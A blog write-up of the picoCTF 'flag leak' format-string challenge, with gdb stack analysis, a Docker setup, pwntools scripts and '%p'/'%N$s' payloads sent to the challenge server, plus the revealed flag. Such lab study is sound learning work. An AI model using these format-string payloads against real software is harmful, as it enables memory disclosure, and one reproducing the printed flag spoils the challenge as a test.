I actually solved this problem last year.

Back then I just brute-forced the offset and got the flag.

A year ago, I was pretty excited that I got the flag by watching John's video .

I recently learned more about format-strings that are worth posting.

file + checksec + C code

It’s a 32 bit dynamically linked ELF. There aren’t any security measures enabled.

file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=17bb7adc72aff4022d6a1c451eb9adcf34df2f8c, for GNU/Linux 3.2.0, not stripped
checksec vuln
[*] '/home/picoctf/pwn/flag_leak/vuln'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>

#define BUFSIZE 64
#define FLAGSIZE 64

void readflag(char* buf, size_t len) {
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,len,f); // size bound read
}

void vuln(){
   char flag[BUFSIZE];
   char story[128];

   readflag(flag, FLAGSIZE);

   printf("Tell me a story and then I'll tell you one >> ");
   scanf("%127s", story);
   printf("Here's a story - \n");
   printf(story);
   printf("\n");
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  vuln();
  return 0;
}

There’s clearly a format-string bug.

printf(story);

On my older blog (written in Korean), I brute-forced the offset and got the flag.

Below is the code I used before. You can read the writeup here .

from pwn import * 

for i in range(100):
    try:
        r=remote('saturn.picoctf.net',56734)
        r.sendlineafter(b'>',f'%{i}$s'.encode())
        r.recvline()
        result=r.recvline()
        print(str(i)+ ': '+str(result))
        r.close()
    except EOFError:
        pass 

Before going to sleep, I suddenly remembered that I had found a way to automate the offset for leaks in format-string-bugs.

I slightly modified my previous code to automate the offset-finding procedure.

It included some redundant code in my opinion.

from pwn import *

context.arch = 'amd64'
p = process('./vuln')

def send_payload(payload):
    p.recvuntil(b'>>')  # Change to match your binary's prompt
    p.sendline(payload)
    return p.recvline()

offset = FmtStr(send_payload).offset
log.info(f'Offset found at {offset}')
p.interactive()


p.interactive()

I expected the code above would magically find the offset; however, when I ran it, it threw an error.

python solve.py 
[+] Starting local process './vuln': pid 11852
Traceback (most recent call last):
  File "/home/hwkim301/picoctf/flag_leak/solve.py", line 11, in <module>
    offset = FmtStr(send_payload).offset
             ^^^^^^^^^^^^^^^^^^^^
  File "/home/hwkim301/venv/lib/python3.12/site-packages/pwnlib/fmtstr.py", line 930, in __init__
    self.offset, self.padlen = self.find_offset()
                               ^^^^^^^^^^^^^^^^^^
  File "/home/hwkim301/venv/lib/python3.12/site-packages/pwnlib/fmtstr.py", line 949, in find_offset
    leak = self.leak_stack(off, marker)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/hwkim301/venv/lib/python3.12/site-packages/pwnlib/fmtstr.py", line 940, in leak_stack
    leak = re.findall(br"START(.*?)END", leak, re.MULTILINE | re.DOTALL)[0]
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
[*] Process './vuln' stopped with exit code 0 (pid 11852)

An important fact I didn’t know until now was that, you can only use the FmtStr class’s offset variable to find the offsets when the binary uses an input function that reads until a newline like fgets ,gets, read.

However, this binary uses scanf, which stops reading input as soon as it encounters a whitespace.

For example you can see below that it stops taking input the second I enter a space.

./vuln 
Tell me a story and then I'll tell you one >> AAAAA %p
Here's a story - 
AAAAA

I read this writeup here to figure out if how to calculate the offset instead of using FmtStr.

So I set a breakpoint right after readflag, at 0x0804935a.

Ran the binary and then calculated the distance from the buffer to the input.

Calculating the offset from the buffer to the flag helps find the offset for the leak.

gef➤  disass vuln
Dump of assembler code for function vuln:
   0x08049333 <+0>:     endbr32
   0x08049337 <+4>:     push   ebp
   0x08049338 <+5>:     mov    ebp,esp
   0x0804933a <+7>:     push   ebx
   0x0804933b <+8>:     sub    esp,0xc4
   0x08049341 <+14>:    call   0x80491f0 <__x86.get_pc_thunk.bx>
   0x08049346 <+19>:    add    ebx,0x2cba
   0x0804934c <+25>:    sub    esp,0x8
   0x0804934f <+28>:    push   0x40
   0x08049351 <+30>:    lea    eax,[ebp-0x48]
   0x08049354 <+33>:    push   eax
   0x08049355 <+34>:    call   0x80492b6 <readflag>
   0x0804935a <+39>:    add    esp,0x10
   0x0804935d <+42>:    sub    esp,0xc
   0x08049360 <+45>:    lea    eax,[ebx-0x1f9c]
   0x08049366 <+51>:    push   eax
   0x08049367 <+52>:    call   0x80490f0 <printf@plt>
   0x0804936c <+57>:    add    esp,0x10
   0x0804936f <+60>:    sub    esp,0x8
   0x08049372 <+63>:    lea    eax,[ebp-0xc8]
   0x08049378 <+69>:    push   eax
   0x08049379 <+70>:    lea    eax,[ebx-0x1f6d]
   0x0804937f <+76>:    push   eax
   0x08049380 <+77>:    call   0x8049180 <__isoc99_scanf@plt>
   0x08049385 <+82>:    add    esp,0x10
   0x08049388 <+85>:    sub    esp,0xc
   0x0804938b <+88>:    lea    eax,[ebx-0x1f67]
   0x08049391 <+94>:    push   eax
   0x08049392 <+95>:    call   0x8049120 <puts@plt>
   0x08049397 <+100>:   add    esp,0x10
   0x0804939a <+103>:   sub    esp,0xc
   0x0804939d <+106>:   lea    eax,[ebp-0xc8]
   0x080493a3 <+112>:   push   eax
   0x080493a4 <+113>:   call   0x80490f0 <printf@plt>
   0x080493a9 <+118>:   add    esp,0x10
   0x080493ac <+121>:   sub    esp,0xc
   0x080493af <+124>:   push   0xa
   0x080493b1 <+126>:   call   0x8049170 <putchar@plt>
   0x080493b6 <+131>:   add    esp,0x10
   0x080493b9 <+134>:   nop
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0xffffc840  →  "hwkim301\n"
$ebx   : 0x0804c000  →  0x0804bf10  →  <_DYNAMIC+0000> add DWORD PTR [eax], eax
$ecx   : 0x0       
$edx   : 0x0804d238  →  0x00000000
$esp   : 0xffffc7b0  →  0xffffc840  →  "hwkim301\n"
$ebp   : 0xffffc888  →  0xffffc8a8  →  0x00000000
$esi   : 0x08049430  →  <__libc_csu_init+0000> endbr32 
$edi   : 0xf7ffcb60  →  0x00000000
$eip   : 0x0804935a  →  <vuln+0027> add esp, 0x10
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffc7b0│+0x0000: 0xffffc840  →  "hwkim301\n"  ← $esp
0xffffc7b4│+0x0004: 0x00000040 ("@"?)
0xffffc7b8│+0x0008: 0x00000000
0xffffc7bc│+0x000c: 0x08049346  →  <vuln+0013> add ebx, 0x2cba
0xffffc7c0│+0x0010: 0xffffffff
0xffffc7c4│+0x0014: 0xf7d87d1c  →  0x00001aaa
0xffffc7c8│+0x0018: 0xf7fc1400  →  0xf7d78000  →  0x464c457f
0xffffc7cc│+0x001c: 0xffffc800  →  0xffffc840  →  "hwkim301\n"
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
    0x8049351 <vuln+001e>      lea    eax, [ebp-0x48]
    0x8049354 <vuln+0021>      push   eax
    0x8049355 <vuln+0022>      call   0x80492b6 <readflag>
●→  0x804935a <vuln+0027>      add    esp, 0x10
    0x804935d <vuln+002a>      sub    esp, 0xc
    0x8049360 <vuln+002d>      lea    eax, [ebx-0x1f9c]
    0x8049366 <vuln+0033>      push   eax
    0x8049367 <vuln+0034>      call   0x80490f0 <printf@plt>
    0x804936c <vuln+0039>      add    esp, 0x10
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "vuln_patched", stopped 0x804935a in vuln (), reason: BREAKPOINT
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x804935a → vuln()
[#1] 0x8049418 → main()
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ 
0x08049351 <+30>:    lea    eax,[ebp-0x48]
0x08049354 <+33>:    push   eax
0x08049355 <+34>:    call   0x80492b6 <readflag>

[ebp-0x48] is where the flag starts.

0x0804939d <+106>:   lea    eax,[ebp-0xc8]
0x080493a3 <+112>:   push   eax
0x080493a4 <+113>:   call   0x80490f0 <printf@plt>

[ebp-0xc8] is where the buffer starts.

gef➤  p/d 0xc8-0x48
$1 = 128

The offset from the buffer to the flag is 128.

However, you need to divide it by 4 since each value on the stack is 4 bytes wide (32bit).

After dividing 128 by 4 you get 32;, however, the offset in the writeup is actually 24.

Huh, that’s weird.

I thought the cause of the different offsets was due to a discrepancy between the Ubuntu version on remote and the Ubuntu version I’m using 24.04.

So I ran pwninit and patched the binary to ensure my computer uses the same libc and ld-linux.so.2 as the server.

Even after all running pwninit, the results were still the same.

I even created a Dockerfile and ran the binary there, but the results did not differ.

It looks like I was going on a wild goose chase, LOL.

Nonetheless, here are some things I’ve learned from this challenge.

1. Calculating offsets using disassembly from gdb or objdump isn’t always 100% correct.

2. Running a program under gdb isn’t the same as running it normally.

gdb itself can slightly change the initial stack layout

3. A Docker container shares the host machine’s kernel.

Subtle differences between the host’s kernel and the remote server’s kernel can alter how a process is loaded to memory.

4. Use pwninit even when you can run the binary.

I previously thought that you should run pwninit only when you can’t run the binary on your computer, but if the binary was built on another version of Ubuntu you should, still use pwninit.

Even if the binary runs fine on a different version of Ubuntu or libc you should use pwninit because when debugging or viewing the disassembly it’s likely to show different disassembly or stack layouts.

I guess that’s why everyone just sent a bunch of %ps to brute force and get the flag.

Dockerfiles

From the here's a libc writeup I explained Dockerfiles but, never had the chance to create one and run a Docker container.

First let’s have a look at which glibc the binary used.

The binary was probably built-on a Ubuntu 20.04 with glibc 2.31.

strings vuln | grep Ubuntu
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0

Now that we know the Ubuntu version, We’ll make a Dockerfile and attach to a container.

Here’s the Dockerfile I used, Gemini created it for me.

# Use the 64-bit Ubuntu 20.04 base image
FROM ubuntu:20.04

# Add support for the i386 (32-bit) architecture
RUN dpkg --add-architecture i386

# Avoid interactive prompts during package installation
ENV DEBIAN_FRONTEND=noninteractive

# --- ADD THIS SECTION ---
# Install locales package and generate the en_US.UTF-8 locale
RUN apt-get update && apt-get install -y locales && \
    locale-gen en_US.UTF-8

# Set the language environment variable for the container
ENV LANG en_US.UTF-8
# --- END OF SECTION ---

# Update and install 32-bit libraries and common pwn tools
RUN apt-get update && apt-get install -y \
    libc6:i386 \
    gdb \
    python3 \
    python3-pip \
    wget \
    && rm -rf /var/lib/apt/lists/*

# Install pwntools
RUN python3 -m pip install pwntools

# Install a compatible version of GEF
RUN wget -q -O ~/.gdbinit-gef.py https://github.com/hugsy/gef/raw/2022.06/gef.py
RUN echo "source ~/.gdbinit-gef.py" >> ~/.gdbinit

The Dockerfile itself looks as if we’re running Linux, Python commands in a shellscript.

After naming the Dockerfile Dockerfile, you can run it with the following commands.

docker build -t 20.04 .
docker run --rm -it 20.04 /bin/bash

The –rm flag automatically removes the container when it exits.

The -i flag (–interactive) keeps the input chanel (STDIN) open.

In words we can understand, it lets you type commands in the container.

The -t flag (–tty) allocates a pseudo-TTY.

In simple terms, creates a terminal.

Then you can wget the binary from picoCTF and run it.

Another important point is that you need to specify the encoding (utf-8) and download a GEF plugin that uses Python 3.8 or earlier, because newer versions uses keywords introduced in Python3.10 or above.

There are a couple of ways to achieve this, like using git checkout, but Gemini just found an older version of the GEF file.

We’ll set a breakpoint right ot the second printf.

I created a local flag.txt and wrote my name (hwkim301) in it.

You can use the telescope telescope command in GEF to dereference an address.

gef➤  telescope $esp -l 40
0xffffc7c0│+0x0000: 0xffffc7d0  →  "AAAA"        ← $esp
0xffffc7c4│+0x0004: 0xffffc7d0  →  "AAAA"
0xffffc7c8│+0x0008: 0x00000000
0xffffc7cc│+0x000c: 0x08049346  →  <vuln+0013> add ebx, 0x2cba
0xffffc7d0│+0x0010: "AAAA"
0xffffc7d4│+0x0014: 0xf7d87d00  →  "PD\r"
0xffffc7d8│+0x0018: 0xf7fc1400  →  0xf7d78000  →  0x464c457f
0xffffc7dc│+0x001c: 0xffffc810  →  0xffffc850  →  "hwkim301\n"
0xffffc7e0│+0x0020: 0xffffffff
0xffffc7e4│+0x0024: 0xf7d8d8dc  →  0x0000221b
0xffffc7e8│+0x0028: 0xf7fc1400  →  0xf7d78000  →  0x464c457f
0xffffc7ec│+0x002c: 0xffffc8a0  →  0xffffffff
0xffffc7f0│+0x0030: 0xf7fa8e34  →  ",\r#"
0xffffc7f4│+0x0034: 0x00000000
0xffffc7f8│+0x0038: 0x0804838d  →  "setresgid"
0xffffc7fc│+0x003c: 0xf7ffda20  →  0x00000000
0xffffc800│+0x0040: 0x0000000d ("\r"?)
0xffffc804│+0x0044: 0xf7fd8ac6  →  <_dl_fixup+00f6> mov ebp, eax
0xffffc808│+0x0048: 0x0804838d  →  "setresgid"
0xffffc80c│+0x004c: 0xf7ffda20  →  0x00000000
0xffffc810│+0x0050: 0xffffc850  →  "hwkim301\n"
0xffffc814│+0x0054: 0xf7ffdbf4  →  0xf7ffdb8c  →  0xf7fc16f0  →  0xf7ffda20  →  0x00000000
0xffffc818│+0x0058: 0xf7fc1720  →  0x080483cd  →  "GLIBC_2.0"
0xffffc81c│+0x005c: 0x00000001
0xffffc820│+0x0060: 0x00000001
0xffffc824│+0x0064: 0x00000000
0xffffc828│+0x0068: 0xf7fc1720  →  0x080483cd  →  "GLIBC_2.0"
0xffffc82c│+0x006c: 0x00000001
0xffffc830│+0x0070: 0x00000050 ("P"?)
0xffffc834│+0x0074: 0xf7ffcfe8  →  0x00033f28
0xffffc838│+0x0078: 0x00000d07
0xffffc83c│+0x007c: 0x08048338  →   add BYTE PTR [ecx+ebp*2+0x62], ch
0xffffc840│+0x0080: 0x0804c034  →  0xf7e7ae50  →  <setresgid+0000> endbr32 
0xffffc844│+0x0084: 0x080484a4  →  0x0804c034  →  0xf7e7ae50  →  <setresgid+0000> endbr32 
0xffffc848│+0x0088: 0x00000307
0xffffc84c│+0x008c: 0x08048338  →   add BYTE PTR [ecx+ebp*2+0x62], ch
0xffffc850│+0x0090: "hwkim301\n"
0xffffc854│+0x0094: "m301\n"
0xffffc858│+0x0098: 0x0000000a ("\n"?)
0xffffc85c│+0x009c: 0xf7e7ae92  →  0xfff0003d ("="?)

The start of the flag is at +0x0090, and dividing it by 4 gives us 36.

You need to divide it by 4 since each value on the stack is 4 bytes wide (32bit.)

gef➤  p/d 0x90/4
$1 = 36

The 36th argument will leak the start of the flag.

We won’t know the offset for the end of the flag because, to calculate it, we need to divide the flag’s length by 4 and add it to 36.

If we can could attach gdb to the remote instance, we could get the length of the flag using gdb, but since we can’t, we’ll have to brute-force for the ending offset.

Now that we know that %36$p is the start of the flag, we’ll send some more %ps to find the ending offset.

nc saturn.picoctf.net 51847
Tell me a story and then I'll tell you one >> .%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
Here's a story - 
.0xffd4d6d0.0xffd4d6f0.0x8049346.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x2e7025.0x6f636970.0x7b465443.0x6b34334c.0x5f676e31.0x67346c46.0x6666305f.0x3474535f.

You can see that almost all the numbers are 0x2e70252e and 0x70252e70 which are ascii values of the format specifier we sent.


from pwn import *

p32(0x2e70252e)
b'.%p.'

p32(0x70252e70)
b'p.%p'

However, if you look carefully, there’s a number that’s totally different.

Unpacking it with pwntools shows you it’s the start of the flag.

We can also confirm the fact that the 36th %p leaks the start of the flag.

from pwn import *

p32(0x6f636970)
b'pico'

The 45th %p will get you the last bit of flag.

I also couldn’t get the flag cleanly, during interactive.

To do that, you’d need to use a multiple for loops, but I didn’t want to, so I just copied the hexadecimal flags and wrote a list-comprehension in Ipython.

My previous code used %24$s to leak the flag, but the newer code uses %36$p through %45$p.

How did both %24$s and %36$p both leak the flag?

What’s the difference between using a $s and $p?

Most of us know that%s is used for strings and %p is used for printing pointer memory addresses.

The %s specifier finds a pointer(an address) on the stack, follows that pointer to a different location in memory, and then prints the string it finds there.

On the other hand the %p or %x specifier finds the raw data directly on the stack and prints that value as a hexadecimal number. It doesn’t follow any pointers.

In conclusion when using %24$s, printf jumps to the 24th value on the stack.

It reads the value at that position, which is a memory address, dereferences it and prints the string found there.

However when using %36$p, printf jumps to the 36th value on the stack, reads the value at that position, and prints the raw-value in hexadecimal.

I also tried to get the flag during interactive mode, but as soon as I sent the format strings, I received an EOF.

You can get the flag during interactive if you use multiple for loops, but I thought it would be overkill, so instead I wrote a list comprehension in IPython after getting an EOF.

from pwn import * 

r = remote('saturn.picoctf.net', 58501)
r.sendline(b'%36$p,%37$p,%38$p,%39$p,%40$p,%41$p,%42$p,%43$p,%44$p,%45$p')
r.interactive()
# 0x6f636970,0x7b465443,0x6b34334c,0x5f676e31,0x67346c46,0x6666305f,0x3474535f,0x395f6b63,0x32653939,0x7d343238
from pwn import *

leak=[0x6f636970,0x7b465443,0x6b34334c,0x5f676e31,0x67346c46,0x6666305f,0x3474535f,0x395f6b63,0x32653939,0x7d343238]

flag=b''.join([p32(x) for x in leak])
print(flag)
# b'picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}'

Reference Writeup

  1. Japanese writeup

This was the only writeup I found that didn’t brute-force the offsets.

Use a translator like DeepL or Google Translate to read it.

Althought it’s a medium difficulty in picoCTF, understanding why 36$p leaks the flag is hard.

I still can’t explain why %24$s returns a sliced flag.

I guess I’ll have to write another format-string bug writeup after I really master format string vulnerabilites.